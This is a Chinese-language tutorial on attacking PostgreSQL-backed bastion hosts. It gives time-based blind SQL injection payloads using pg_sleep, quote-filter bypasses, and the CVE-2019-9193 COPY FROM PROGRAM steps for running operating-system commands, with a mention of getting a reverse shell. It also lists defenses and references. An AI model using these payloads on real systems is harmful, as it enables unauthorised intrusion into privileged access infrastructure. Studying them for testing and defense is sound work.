PostgreSQL 堡垒机 SQL 注入与 RCE 漏洞利用指南<\/h1>

1. 堡垒机安全概述<\/h2>
堡垒机(Bastion Host)，也称为跳板机或运维安全审计系统，是用于管理和控制内部网络资源访问的安全设备。作为运维人员访问内部服务器和网络设备的唯一入口，它通过集中化的身份认证、权限管理和操作审计来确保运维操作的安全性和可追溯性。<\/p>

2. 漏洞发现与初步探测<\/h2>

2.1 初始信息收集<\/h3>

目标系统通常通过SSH(22端口)或RDP(3389端口)提供服务<\/li>
许多厂商自行实现SSH\/RDP服务，可能存在漏洞<\/li>

通过SSH banner信息可判断是否为自定义实现<\/li> <\/ul>

2.2 数据库类型判断<\/h3>

判断目标数据库是否为PostgreSQL的方法：<\/p>

端口判断<\/strong>：PostgreSQL默认使用5432端口<\/li>

函数差异<\/strong>：

字符串长度函数：len<\/code> vs length<\/code><\/li>
版本查询：version<\/code> vs @@version<\/code><\/li>
子字符串函数：substring<\/code> vs substr<\/code><\/li> <\/ul> <\/li>
特殊符号处理<\/strong>：观察数据库对特定符号的处理方式<\/li>
系统表判断<\/strong>： MySQL(version>5.0)：information_schema<\/code><\/li> Oracle：all_tables<\/code><\/li> SQL Server：sysobjects<\/code><\/li> <\/ul> <\/li> 盲注函数<\/strong>：PostgreSQL特有的函数行为<\/li> <\/ol> 3. PostgreSQL 盲注技术<\/h2> 3.1 时间盲注检测<\/h3> 如果服务器响应时间随有效负载明显增加(约20秒)，则可能存在漏洞。<\/p> 参数为整数时：<\/p> pg_sleep(20<\/span>); -- - <\/span><\/span><\/span><\/code><\/pre><\/li> 参数为字符串时：<\/p> '||pg_sleep(20); -- - <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> 3.2 绕过技术<\/h3> 引号限制绕过<\/strong>：<\/p> 使用$<\/code>符号定义标签： SELECT<\/span> $<\/span>quote$test$quote$; <\/span><\/span><\/code><\/pre>等价于： SELECT<\/span> 'test'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 使用CHR()<\/code>函数拼接字符串<\/li> <\/ul> <\/li> 条件判断<\/strong>： PostgreSQL使用CASE WHEN<\/code>语句代替IF<\/code>：<\/p> CASE<\/span> WHEN<\/span> condition THEN<\/span> value1 ELSE<\/span> value2 END<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4. PostgreSQL 命令执行漏洞 (CVE-2019-9193)<\/h2> 4.1 漏洞概述<\/h3> PostgreSQL 9.3-11.2版本中存在"COPY TO\/FROM PROGRAM"功能，允许数据库超级用户及pg_read_server_files组中的用户执行操作系统命令。<\/p> 4.2 漏洞利用步骤<\/h3> 删除可能存在的表(可选)<\/strong>：<\/p> DROP<\/span> TABLE<\/span> IF<\/span> EXISTS<\/span> cmd_exec; <\/span><\/span><\/code><\/pre><\/li> 创建保存命令输出的表<\/strong>：<\/p> CREATE<\/span> TABLE<\/span> cmd_exec(cmd_output text); <\/span><\/span><\/code><\/pre><\/li> 执行系统命令<\/strong>：<\/p> COPY<\/span> cmd_exec FROM<\/span> PROGRAM 'id'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 查看命令输出<\/strong>：<\/p> SELECT<\/span> *<\/span> FROM<\/span> cmd_exec; <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.3 实际利用技巧<\/h3> 当有SSH密码长度限制时，可分段写入文件再执行<\/li> 可通过此方法反弹shell获取系统权限<\/li> <\/ul> 5. 防御措施<\/h2> 升级PostgreSQL<\/strong>：升级到11.3或更高版本<\/li> 权限控制<\/strong>：限制pg_read_server_files组权限<\/li> 避免使用超级用户账户连接应用<\/li> <\/ul> <\/li> 输入验证<\/strong>：对所有用户输入进行严格过滤<\/li> 最小权限原则<\/strong>：应用程序使用最低必要权限的数据库账户<\/li> 禁用危险功能<\/strong>：如非必要，禁用COPY PROGRAM功能<\/li> <\/ol> 6. 参考资源<\/h2> (CVE-2019-9193)PostgreSQL 高权限命令执行漏洞 - FreeBuf网络安全行业门户<\/li> PostgreSQL官方安全公告<\/li> <\/ul> 附录：完整SSH交互Python脚本示例<\/h2> （注：实际脚本应根据目标环境调整，此处略去具体实现细节）<\/p>